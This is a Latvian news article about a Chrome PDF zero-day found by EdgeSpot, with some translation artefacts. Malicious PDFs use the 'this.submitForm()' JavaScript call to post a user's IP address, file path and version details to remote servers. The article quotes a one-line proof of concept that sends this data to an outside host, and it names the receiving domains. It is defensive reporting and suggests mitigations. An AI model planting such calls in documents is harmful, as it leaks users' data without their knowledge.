Izmantojiet atklāšanas pakalpojumu EdgeSpot atklāja intriģējošu Chrome nulles dienas ievainojamību, izmantojot PDF dokumentus. Ievainojamība ļauj uzbrucējiem novākt sensitīvu informāciju, izmantojot ļaunprātīgus PDF dokumentus, kas atvērti pārlūkā Chrome.

Tiklīdz upuris atver attiecīgos PDF failus pārlūkā Google Chrome, ļaunprātīga programma sāk darboties fonā, apkopojot lietotāja datus.

Pēc tam dati tiek pārsūtīti uz attālo serveri, kuru kontrolē hakeri. Jums varētu rasties jautājums, kādus datus uzbrucēji sūc, un tie jūsu datorā mērķē uz šādiem datiem:

• IP adrese
• Pilns PDF faila ceļš sistēmā
• OS un Chrome versijas

Sargieties no ļaunprātīgas programmatūras pārņemtiem PDF failiem

Jūs varētu būt pārsteigts, uzzinot, ka nekas nenotiek, ja Adobe Reader tiek izmantots PDF failu atvēršanai. Turklāt HTTP POST pieprasījumus izmanto datu pārsūtīšanai uz attālajiem serveriem bez lietotāja iejaukšanās.

Eksperti pamanīja, ka datus saņem viens no diviem domēniem readnotifycom vai burpcollaboratornet.

Varat iedomāties uzbrukuma intensitāti, ņemot vērā faktu, ka lielākā daļa pretvīrusu programmatūras nespēj atklāt EdgeSpot atklātos paraugus.

Eksperti atklāj, ka uzbrucēji izmanto “this.submitForm ()” PDF Javascript API, lai apkopotu sensitīvu lietotāju informāciju.

Mēs to pārbaudījām ar minimālu PoC, vienkāršs API zvans, piemēram, “this.submitForm ('http://google.com/test')”, liks Google Chrome nosūtīt personiskos datus vietnei google.com.

Eksperti faktiski uzzināja, ka šo Chrome kļūdu izmanto divas atšķirīgas kaitīgo PDF failu kopas. Abas no tām tika izplatītas attiecīgi 2017. gada oktobrī un 2018. gada septembrī.

Proti, uzbrucēji apkopotos datus var izmantot, lai nākotnē pielāgotu uzbrukumus. Pārskati liecina, ka pirmā failu partija tika apkopota, izmantojot ReadNotify PDF izsekošanas pakalpojumu.

Lietotāji var izmantot pakalpojumu, lai sekotu lietotāju skatījumiem. EdgeSpot nav kopīgojis nekādu informāciju par PDF failu otrās kopas raksturu.

Kā saglabāt aizsardzību

Ekspluatācijas atklāšanas pakalpojums EdgeSpot vēlējās brīdināt lietotājus Chrome lietotājus par iespējamiem riskiem, jo ​​nav paredzēts, ka tuvākajā nākotnē tiks izlaists plāksteris.

EdgeSpot pagājušajā gadā ziņoja Google par ievainojamību, un uzņēmums solīja aprīļa beigās atbrīvot plāksteri. H

Tomēr varat apsvērt iespēju īslaicīgi novērst problēmu, lokāli apskatot saņemtos PDF dokumentus, izmantojot alternatīvu PDF lasītāja lietotni.

Varat arī atvērt PDF failus pārlūkā Chrome, atvienojot sistēmas no interneta. Tikmēr jūs varat gaidīt pārlūka Chrome 74 atjauninājumu, kuru paredzēts ieviest 23. aprīlī.